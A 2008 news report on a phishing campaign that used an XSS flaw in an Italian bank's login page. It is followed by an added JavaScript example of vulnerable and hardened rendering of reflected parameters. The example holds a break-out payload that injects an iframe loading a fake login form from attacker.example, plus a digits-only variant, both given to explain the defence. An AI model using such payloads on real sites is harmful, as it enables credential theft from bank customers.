Phishers Exploit XSS Flaw to Operate Banking Scam

Internet services company Netcraft, based in Bath, warns that an 'extremely convincing' phishing scam is exploiting the legitimate website of the Italian bank Banca Fideuram, showing how cross-site scripting (XSS) flaws can make phishing attacks almost impossible to detect.

According to Netcraft, the attack reaches users by the usual route: a genuine-looking e-mail asking recipients to log in to the bank's website. What sets it apart is that it executes on the bank's own website, under the real SSL certificate issued to Banca Fideuram. The e-mail carries a crafted URL that exploits an XSS vulnerability to insert a modified login form into the login page of the bank's site. The injected code places an iframe on the login page, which loads a slightly altered login form from a web server hosted in Taiwan. The inserted form includes JavaScript that renders its Italian text in a way intended to get around security filters, Netcraft noted.

The attack vector also makes it more convincing to victims. The URL injects numbers directly into a JavaScript routine that already runs on the bank's LoginServlet page. Because the injected material consists only of digits and commas, the URL raises no obvious suspicion, so even an experienced user of the banking site would find it hard to recognise the XSS at work.

According to Paul Mutton of Netcraft, the attack underlines how serious the implications of XSS vulnerabilities are for banking sites. Netcraft published Mutton's statement in the second week of January 2008.
Mutton added that the attack shows that 'https' at the start of a URL does not guarantee security, and neither does checking that the correct domain name appears in the browser's address bar. Netcraft said it has informed the bank of the attack and has taken down the phishing site hosting the malicious form, cutting off its access to users. SPAMfighter News - 1/24/2008
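The pattern described above, a request parameter reflected into a JavaScript call that already runs on the login page, is easy to reproduce in miniature. The following is an added example and is not Banca Fideuram's or Netcraft's code; it does not reconstruct the real exploit. The page template, the initLogin() function, the parameter names timeout and lang, the value ranges and the attacker host attacker.example are all assumptions made for illustration. It shows the vulnerable rendering beside a hardened one, and why "only digits and commas" is not a safety criterion: the fix is a strict per-parameter allow-list (exactly one integer, in range) plus serialisation instead of concatenation.

```javascript
// Added example (hypothetical page, not the bank's code): a login page that
// reflects query-string values into an inline <script> call.

// Vulnerable: values are concatenated straight into a JavaScript call.
// Nothing checks that each value is a single number.
function renderLoginVulnerable(query) {
  const timeout = query.timeout !== undefined ? query.timeout : '30';
  const lang = query.lang !== undefined ? query.lang : '0';
  return [
    '<form id="login" action="/LoginServlet" method="post">',
    '  <input name="user"><input name="pass" type="password">',
    '</form>',
    `<script>initLogin(${timeout}, ${lang});</script>`,
  ].join('\n');
}

// Hardened: each value must be exactly one integer inside a known range, and
// it is serialised with JSON.stringify rather than pasted raw, so the script
// context cannot be reopened even if the allow-list is widened later.
function parseBoundedInt(raw, fallback, min, max) {
  if (raw === undefined) return fallback;
  if (!/^\d{1,4}$/.test(raw)) throw new Error('rejected parameter: ' + raw);
  const n = Number(raw);
  if (n < min || n > max) throw new Error('out of range: ' + raw);
  return n;
}

function renderLoginHardened(query) {
  const timeout = parseBoundedInt(query.timeout, 30, 5, 600);
  const lang = parseBoundedInt(query.lang, 0, 0, 3);
  return [
    '<form id="login" action="/LoginServlet" method="post">',
    '  <input name="user"><input name="pass" type="password">',
    '</form>',
    `<script>initLogin(${JSON.stringify(timeout)}, ${JSON.stringify(lang)});</script>`,
  ].join('\n');
}

// Two constructed payloads (assumed, for illustration only).
// The first is the textbook break-out: it closes the call and appends a
// statement that loads a look-alike form in an iframe from a host the
// attacker controls. The second contains only digits and commas, the shape
// of input the article describes, and still changes what the call does by
// adding arguments the page never intended to accept.
const PAYLOAD_BREAKOUT =
  "30);document.body.innerHTML='<iframe src=\"http://attacker.example/login\"></iframe>';//";
const PAYLOAD_DIGITS_ONLY = '30,2,1';

// Returns the inline script the browser would execute, so the two renderers
// can be compared without a browser.
function extractInlineScript(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  return m ? m[1] : null;
}

function tryRenderHardened(query) {
  try {
    renderLoginHardened(query);
    return 'rendered';
  } catch (e) {
    return 'rejected';
  }
}

// Demonstration: the vulnerable page emits whatever it was given; the
// hardened page refuses both payloads and emits one integer per argument.
function demo() {
  return {
    vulnBreakout: extractInlineScript(renderLoginVulnerable({ timeout: PAYLOAD_BREAKOUT })),
    vulnDigits: extractInlineScript(renderLoginVulnerable({ timeout: PAYLOAD_DIGITS_ONLY })),
    hardenedOk: extractInlineScript(renderLoginHardened({ timeout: '45', lang: '2' })),
    hardenedBreakout: tryRenderHardened({ timeout: PAYLOAD_BREAKOUT }),
    hardenedDigits: tryRenderHardened({ timeout: PAYLOAD_DIGITS_ONLY }),
  };
}

console.log(demo());
```

The digits-only payload turns `initLogin(30, 0)` into `initLogin(30,2,1, 0)`, which is why a URL that "only contains numbers" can still alter the page's behaviour; the hardened version rejects it because `30,2,1` is not a single integer. The more robust design is to keep request data out of script text altogether, for example by placing the validated values in a data attribute that the page's own script reads, and to back that with a Content Security Policy that forbids inline script.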